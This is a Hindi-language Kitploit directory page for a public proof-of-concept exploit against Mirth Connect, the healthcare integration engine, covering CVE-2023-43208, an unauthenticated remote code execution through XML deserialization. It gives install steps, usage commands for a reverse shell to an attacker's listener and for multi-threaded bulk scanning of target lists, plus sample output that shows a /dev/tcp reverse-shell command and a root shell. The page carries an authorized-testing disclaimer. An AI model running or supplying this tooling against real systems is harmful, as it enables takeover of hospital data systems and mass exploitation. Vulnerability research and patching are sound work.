Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/4nuxd/cve-2023-43208
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

XML डिसीरियलाइज़ेशन के माध्यम से Mirth Connect में CVE-2023-43208 के लिए अप्रमाणित RCE शोषण, संस्करण पहचान, बल्क स्कैनिंग, और इंटरैक्टिव PTY शेल के साथ।

रिपॉजिटरी देखें
126 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

CVE-2023-43208 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Mirth Connect के 4.4.1 से पहले के संस्करणों में एक अप्रमाणित रिमोट कोड निष्पादन भेद्यता।


विवरण

Mirth Connect एक व्यापक रूप से तैनात ओपन-सोर्स हेल्थकेयर इंटीग्रेशन इंजन है। यह भेद्यता /api/users एंडपॉइंट के माध्यम से एक Java डिसेरियलाइज़ेशन दोष का लाभ उठाती है, जो अप्रमाणित RCE प्राप्त करने के लिए Apache Commons Collections गैजेट्स की श्रृंखला बनाने वाले क्राफ्टेड XML पेलोड का उपयोग करती है।

उन्नत संस्करण मूल pwncat लिसनर को Python बिल्टिन्स (socket, select, , ) का उपयोग करके पूरी तरह से डिपेंडेंसी-फ्री इंटरैक्टिव PTY शेल से बदल देता है। कनेक्शन पर शेल स्वचालित रूप से पूर्ण PTY में अपग्रेड हो जाता है।

tty
termios

प्रभावित संस्करण

सॉफ्टवेयरअसुरक्षित संस्करणसुधारित संस्करण
Mirth Connect< 4.4.14.4.1+

विशेषताएँ

  • स्वचालित Mirth Connect इंस्टेंस पहचान
  • संस्करण फिंगरप्रिंटिंग और भेद्यता जांच
  • XML डिसेरियलाइज़ेशन पेलोड के माध्यम से अप्रमाणित RCE
  • ऑटो PTY शेल अपग्रेड (python3/python/script फ़ॉलबैक)
  • सही टर्मिनल आकार प्रसार (stty rows/cols)
  • मल्टी-थ्रेडिंग समर्थन के साथ बल्क स्कैनर
  • असुरक्षित लक्ष्यों को फ़ाइल में आउटपुट करें
  • कोई pwncat डिपेंडेंसी नहीं — लिसनर के लिए केवल stdlib

स्थापना

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

आवश्यकताएँ

root@kitploit:~
requests
packaging
rich
alive-progress

उपयोग

एकल लक्ष्य — शेल प्राप्त करें

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

एकल लक्ष्य — ngrok / बाइंड पोर्ट के साथ

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

फ़ाइल से बल्क स्कैन

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

तर्क

फ़्लैगविवरण
-u, --urlलक्ष्य URL
-lh, --lhostआपका लिसनिंग IP
-lp, --lportआपका लिसनिंग पोर्ट
-bp, --bindportबाइंड पोर्ट ओवरराइड (ngrok के साथ उपयोगी)
-f, --fileलक्ष्य URL की सूची वाली फ़ाइल
-o, --outputअसुरक्षित लक्ष्यों को फ़ाइल में सहेजें
-t, --threadsस्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 50)

उदाहरण आउटपुट

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

अस्वीकरण

यह उपकरण केवल अधिकृत पेनिट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


श्रेय

  • कोड द्वारा: K3ysTr0K3R और Chocapikk
  • उन्नति द्वारा: 4nuxd
टूल डाउनलोड करें